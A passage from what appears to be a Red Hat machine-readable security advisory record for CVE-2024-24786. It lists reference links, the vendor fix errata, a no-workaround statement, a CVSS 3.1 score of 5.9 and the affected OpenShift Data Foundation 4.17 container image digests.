"https://nvd.nist.gov/vuln/detail/CVE-2024-24786", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-24786", }, { category: "external", summary: "https://go.dev/cl/569356", url: "https://go.dev/cl/569356", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/ArQ6CDgtEjY/", url: "https://groups.google.com/g/golang-announce/c/ArQ6CDgtEjY/", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-2611", url: "https://pkg.go.dev/vuln/GO-2024-2611", }, ], release_date: "2024-03-05T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-30T14:25:22+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8676", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", 